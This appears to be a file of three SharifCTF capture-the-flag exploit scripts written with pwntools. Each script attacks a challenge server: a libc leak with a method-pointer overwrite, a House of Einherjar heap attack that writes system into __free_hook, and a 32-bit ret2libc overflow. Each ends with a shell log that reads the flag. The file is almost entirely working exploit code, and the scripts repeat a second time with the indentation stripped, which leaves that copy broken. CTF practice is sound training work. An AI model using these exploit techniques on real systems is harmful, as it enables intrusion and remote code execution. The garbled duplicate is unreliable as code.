0xacb/pwn-125.py

## pwn-125.py
from pwn import *

'''
Have you ever played with this *special* seq holder in Python?
nc ctf.sharif.edu 22106
Alternative: nc 213.233.161.38 22106
'''

local = False

if local:
  r = process("./server.py")
else:
  r = remote("213.233.161.38", 22106)

def menu():
	r.recvuntil("Exit")

def create_db(id, tag, l):
	r.sendline("1")
	r.sendline(str(id))
	r.sendline(tag)
	r.sendline(str(l))

def edit_db(tag, seq=None):
	r.sendline("2")
	r.recvuntil("[2] seq")
	r.sendline("1")
	r.sendline(tag)

def print_db(tag=True):
	r.sendline("3")
	r.recvuntil("[2] seq")
	if tag:
		r.sendline("1")
		r.recvuntil("tag: ")
	else:
		r.sendline("2")
		r.recvuntil("seq: ")
		return r.recvuntil("1.")[:-3]


create_db(0, "", 20)
menu()

leak_s = print_db(tag=False)
libc_leak = u64(leak_s.ljust(8, "\x00"))
info("libc_leak: %s" % hex(libc_leak))

libc_offset = 0x7fa3043f7b88-0x00007fa304033000
libc_base = libc_leak - libc_offset
info("libc_base: %s" % hex(libc_base))

menu()

writable_addr = 0x921010
one_shot_shell = libc_base + 0x4526a
edit_db("A"*8 + p64(0)+ p64(0) + p64(writable_addr) + p64(20) + p64(one_shot_shell) + p64(0)) # overflow and overwrite db method
menu()

r.sendline("5")

r.interactive()

'''
[+] Opening connection to 213.233.161.38 on port 22106: Done
[*] libc_leak: 0x7f534050bb88
[*] libc_base: 0x7f5340147000
[*] Switching to interactive mode

Enter selected menu> $ id
uid=1001(suctf) gid=1001(suctf) groups=1001(suctf)
$ cat /home/suctf/flag
SharifCTF{0N3_M0R3_5T3P_70_**J1T**_H34V3N}
'''

## pwn-250.py
from pwn import *

'''
Someone has designed this top secret management service for us. He was insisting on the term `t00p`. Could you please take a look and find out why?
nc ctf.sharif.edu 22107
Alternative: nc 213.233.161.38 22107
'''

local = False

master_key = "wjigaep;r[jg]ahrg[es9hrg"

if local:
	r = process("./t00p_secrets")
else:
	r = remote("213.233.161.38", 22107)

r.recvuntil("Enter your master key: ")
r.sendline(master_key)


def menu():
	return r.recvuntil("> ")

def create(idx, size, content, binary=True):
	r.sendline("1")
	r.recvuntil("Enter secret idx: ")
	r.sendline(str(idx))
	r.recvuntil("Enter secret body size: ")
	r.sendline(str(size))
	r.recvuntil("String(1): ")
	if binary:
		r.sendline("0")
	else:
		r.sendline("1")
	r.recvuntil("):")
	r.send(content)

def edit(idx, content, binary=True):
	r.sendline("3")
	r.recvuntil("Please enter secret id to edit: ")
	r.sendline(str(idx))
	r.recvuntil("String(1): ")
	if binary:
		r.sendline("0")
	else:
		r.sendline("1")
	r.recvuntil("content: ")
	r.send(content)


def delete(idx):
	r.sendline("2")
	r.recvuntil("to delete: ")
	r.sendline(str(idx))


def print_secret(idx):
	r.sendline("5")
	r.recvuntil("Please enter secret id to print: ")
	r.sendline(str(idx))
	s = r.recvuntil("1.")[:-3]
	if "No such secret!" in s:
		return ""
	index = s.find("content: ")+9
	return s[index:s.find("\n",index)]

def change_master(master_key):
	r.sendline("7")
	r.recvuntil("Enter your master key: ")
	r.send(master_key)
	r.recvuntil("Enter your master key: ")
	r.send(master_key)


menu()

# leak libc address:
create(0, 128, "A"*4)
menu()

create(1, 128, "B"*4)
menu()

create(2, 128, "C"*4)
menu()

delete(1)
menu()

create(1, 128, "A"*8)
menu()

s = print_secret(1)
libc_address = u64(s[8:16])
info("libc leak: %s" % hex(libc_address))

libc_offset = 0x3c4b78

libc_base = libc_address-libc_offset
info("libc base: %s" % hex(libc_base))

# clean up
delete(0)
menu()

delete(1)
menu()

delete(2)
menu()

# heap leak
create(0, 16, "A"*4)
menu()

create(1, 16, "B"*4)
menu()

create(2, 16, "C"*4)
menu()

delete(1)
menu()

delete(0)
menu()

create(0, 8, "\x30")

menu()

s = print_secret(0)
heap_address = u64(s[0:8].ljust(8, "\x00"))
info("heap leak: %s" % hex(heap_address))

heap_base = heap_address-0x30
info("heap_base: %s" % hex(heap_base))

# clean up
delete(2)
menu()

delete(0)
menu()

# house of einherjar
create(7, 0x100, "e") # size
menu()

create(4, 40, "a"*10)
menu()

create(5, 0xf8, "b"*10)
menu()

edit(4, "a"*40, False) # OBO
menu()

target = 0x602098

evil_prev_size = (heap_base + 0x1b0)-(target)
info("prev_size: %s" % hex(evil_prev_size))
edit(4, "a"*0x20 + p64(evil_prev_size), True)
menu()

new_master = p64(evil_prev_size) + p64(target) + p64(target)
change_master(new_master)

delete(5)
menu()

free_hook = libc_base + 0x3c67a8
system = libc_base + 0x45390

info("free_hook: %s" % hex(free_hook))
info("system: %s" % hex(system))

# write system to free_hook
create(5, 512, "/bin/sh\x00".ljust((8*6), "\x00") + p64(free_hook))
menu()

edit(4, p64(system))
menu()

delete(5)

r.interactive()

'''
[+] Opening connection to 213.233.161.38 on port 22107: Done
[*] libc leak: 0x7f7d4e8fcb78
[*] libc base: 0x7f7d4e538000
[*] heap leak: 0x237d030
[*] heap_base: 0x237d000
[*] prev_size: 0x1d7b118
[*] free_hook: 0x7f7d4e8fe7a8
[*] system: 0x7f7d4e57d390
[*] Switching to interactive mode
$ id
uid=1001(suctf) gid=1001(suctf) groups=1001(suctf)
$ cat /home/suctf/flag
SharifCTF{R34V1L1NG_S3CR3T5_VI4_51NGL3_NULL_BY73}
'''

## pwn-75.py
from pwn import *

'''
It all started with a leak bang
nc ctf.sharif.edu 4801
Alternative: nc 213.233.161.38 4801
'''

local = False

if local:
	r = process("./vuln4")
else:
	r = remote("213.233.161.38", 4801)

# leak puts address
puts_got = 0x8049874
puts_plt = 0x80483A0
main = 0x80484EA

r.recvuntil("yourself\n")

payload = "A"*22 + p32(puts_plt) + p32(main) + p32(puts_got) # return to main

r.sendline(payload)

s = r.recvuntil("This")[:-5]
puts_libc = u32(s[0:4])
info("puts_libc = %s" % hex(puts_libc))

r.recvuntil("yourself\n")

# system("/bin/sh")
system_offset = 0x565b4ca0-0x5658fda0
bin_sh_offset = 0x566b0a0b-0x565b4ca0

system_libc = puts_libc - system_offset
bin_sh = puts_libc + bin_sh_offset

info("system_libc = %s" % hex(system_libc))
info("bin_sh = %s" % hex(bin_sh))

payload = "A"*22 + p32(system_libc) + p32(main) + p32(bin_sh)

r.sendline(payload)

r.interactive()

'''
[*] puts_libc = 0xb75cbca0
[*] system_libc = 0xb75a6da0
[*] bin_sh = 0xb76c7a0b
[*] Switching to interactive mode
$ id
uid=1002(ctfuser) gid=1002(ctfuser) groups=1002(ctfuser)
$ cat /home/ctfuser/flag
SharifCTF{7af9dab81dff481772609b97492d6899}
'''
	from pwn import *

	'''
	Have you ever played with this special seq holder in Python?
	nc ctf.sharif.edu 22106
	Alternative: nc 213.233.161.38 22106
	'''

	local = False

	if local:
	r = process("./server.py")
	else:
	r = remote("213.233.161.38", 22106)

	def menu():
	r.recvuntil("Exit")

	def create_db(id, tag, l):
	r.sendline("1")
	r.sendline(str(id))
	r.sendline(tag)
	r.sendline(str(l))

	def edit_db(tag, seq=None):
	r.sendline("2")
	r.recvuntil("[2] seq")
	r.sendline("1")
	r.sendline(tag)

	def print_db(tag=True):
	r.sendline("3")
	r.recvuntil("[2] seq")
	if tag:
	r.sendline("1")
	r.recvuntil("tag: ")
	else:
	r.sendline("2")
	r.recvuntil("seq: ")
	return r.recvuntil("1.")[:-3]


	create_db(0, "", 20)
	menu()

	leak_s = print_db(tag=False)
	libc_leak = u64(leak_s.ljust(8, "\x00"))
	info("libc_leak: %s" % hex(libc_leak))

	libc_offset = 0x7fa3043f7b88-0x00007fa304033000
	libc_base = libc_leak - libc_offset
	info("libc_base: %s" % hex(libc_base))

	menu()

	writable_addr = 0x921010
	one_shot_shell = libc_base + 0x4526a
	edit_db("A"*8 + p64(0)+ p64(0) + p64(writable_addr) + p64(20) + p64(one_shot_shell) + p64(0)) # overflow and overwrite db method
	menu()

	r.sendline("5")

	r.interactive()

	'''
	[+] Opening connection to 213.233.161.38 on port 22106: Done
	[*] libc_leak: 0x7f534050bb88
	[*] libc_base: 0x7f5340147000
	[*] Switching to interactive mode

	Enter selected menu> $ id
	uid=1001(suctf) gid=1001(suctf) groups=1001(suctf)
	$ cat /home/suctf/flag
	SharifCTF{0N3_M0R3_5T3P_70_J1T_H34V3N}
	'''
	from pwn import *

	'''
	Someone has designed this top secret management service for us. He was insisting on the term `t00p`. Could you please take a look and find out why?
	nc ctf.sharif.edu 22107
	Alternative: nc 213.233.161.38 22107
	'''

	local = False

	master_key = "wjigaep;r[jg]ahrg[es9hrg"

	if local:
	r = process("./t00p_secrets")
	else:
	r = remote("213.233.161.38", 22107)

	r.recvuntil("Enter your master key: ")
	r.sendline(master_key)


	def menu():
	return r.recvuntil("> ")

	def create(idx, size, content, binary=True):
	r.sendline("1")
	r.recvuntil("Enter secret idx: ")
	r.sendline(str(idx))
	r.recvuntil("Enter secret body size: ")
	r.sendline(str(size))
	r.recvuntil("String(1): ")
	if binary:
	r.sendline("0")
	else:
	r.sendline("1")
	r.recvuntil("):")
	r.send(content)

	def edit(idx, content, binary=True):
	r.sendline("3")
	r.recvuntil("Please enter secret id to edit: ")
	r.sendline(str(idx))
	r.recvuntil("String(1): ")
	if binary:
	r.sendline("0")
	else:
	r.sendline("1")
	r.recvuntil("content: ")
	r.send(content)


	def delete(idx):
	r.sendline("2")
	r.recvuntil("to delete: ")
	r.sendline(str(idx))


	def print_secret(idx):
	r.sendline("5")
	r.recvuntil("Please enter secret id to print: ")
	r.sendline(str(idx))
	s = r.recvuntil("1.")[:-3]
	if "No such secret!" in s:
	return ""
	index = s.find("content: ")+9
	return s[index:s.find("\n",index)]

	def change_master(master_key):
	r.sendline("7")
	r.recvuntil("Enter your master key: ")
	r.send(master_key)
	r.recvuntil("Enter your master key: ")
	r.send(master_key)


	menu()

	# leak libc address:
	create(0, 128, "A"*4)
	menu()

	create(1, 128, "B"*4)
	menu()

	create(2, 128, "C"*4)
	menu()

	delete(1)
	menu()

	create(1, 128, "A"*8)
	menu()

	s = print_secret(1)
	libc_address = u64(s[8:16])
	info("libc leak: %s" % hex(libc_address))

	libc_offset = 0x3c4b78

	libc_base = libc_address-libc_offset
	info("libc base: %s" % hex(libc_base))

	# clean up
	delete(0)
	menu()

	delete(1)
	menu()

	delete(2)
	menu()

	# heap leak
	create(0, 16, "A"*4)
	menu()

	create(1, 16, "B"*4)
	menu()

	create(2, 16, "C"*4)
	menu()

	delete(1)
	menu()

	delete(0)
	menu()

	create(0, 8, "\x30")

	menu()

	s = print_secret(0)
	heap_address = u64(s[0:8].ljust(8, "\x00"))
	info("heap leak: %s" % hex(heap_address))

	heap_base = heap_address-0x30
	info("heap_base: %s" % hex(heap_base))

	# clean up
	delete(2)
	menu()

	delete(0)
	menu()

	# house of einherjar
	create(7, 0x100, "e") # size
	menu()

	create(4, 40, "a"*10)
	menu()

	create(5, 0xf8, "b"*10)
	menu()

	edit(4, "a"*40, False) # OBO
	menu()

	target = 0x602098

	evil_prev_size = (heap_base + 0x1b0)-(target)
	info("prev_size: %s" % hex(evil_prev_size))
	edit(4, "a"*0x20 + p64(evil_prev_size), True)
	menu()

	new_master = p64(evil_prev_size) + p64(target) + p64(target)
	change_master(new_master)

	delete(5)
	menu()

	free_hook = libc_base + 0x3c67a8
	system = libc_base + 0x45390

	info("free_hook: %s" % hex(free_hook))
	info("system: %s" % hex(system))

	# write system to free_hook
	create(5, 512, "/bin/sh\x00".ljust((8*6), "\x00") + p64(free_hook))
	menu()

	edit(4, p64(system))
	menu()

	delete(5)

	r.interactive()

	'''
	[+] Opening connection to 213.233.161.38 on port 22107: Done
	[*] libc leak: 0x7f7d4e8fcb78
	[*] libc base: 0x7f7d4e538000
	[*] heap leak: 0x237d030
	[*] heap_base: 0x237d000
	[*] prev_size: 0x1d7b118
	[*] free_hook: 0x7f7d4e8fe7a8
	[*] system: 0x7f7d4e57d390
	[*] Switching to interactive mode
	$ id
	uid=1001(suctf) gid=1001(suctf) groups=1001(suctf)
	$ cat /home/suctf/flag
	SharifCTF{R34V1L1NG_S3CR3T5_VI4_51NGL3_NULL_BY73}
	'''
	from pwn import *

	'''
	It all started with a leak bang
	nc ctf.sharif.edu 4801
	Alternative: nc 213.233.161.38 4801
	'''

	local = False

	if local:
	r = process("./vuln4")
	else:
	r = remote("213.233.161.38", 4801)

	# leak puts address
	puts_got = 0x8049874
	puts_plt = 0x80483A0
	main = 0x80484EA

	r.recvuntil("yourself\n")

	payload = "A"*22 + p32(puts_plt) + p32(main) + p32(puts_got) # return to main

	r.sendline(payload)

	s = r.recvuntil("This")[:-5]
	puts_libc = u32(s[0:4])
	info("puts_libc = %s" % hex(puts_libc))

	r.recvuntil("yourself\n")

	# system("/bin/sh")
	system_offset = 0x565b4ca0-0x5658fda0
	bin_sh_offset = 0x566b0a0b-0x565b4ca0

	system_libc = puts_libc - system_offset
	bin_sh = puts_libc + bin_sh_offset

	info("system_libc = %s" % hex(system_libc))
	info("bin_sh = %s" % hex(bin_sh))

	payload = "A"*22 + p32(system_libc) + p32(main) + p32(bin_sh)

	r.sendline(payload)

	r.interactive()

	'''
	[*] puts_libc = 0xb75cbca0
	[*] system_libc = 0xb75a6da0
	[*] bin_sh = 0xb76c7a0b
	[*] Switching to interactive mode
	$ id
	uid=1002(ctfuser) gid=1002(ctfuser) groups=1002(ctfuser)
	$ cat /home/ctfuser/flag
	SharifCTF{7af9dab81dff481772609b97492d6899}
	'''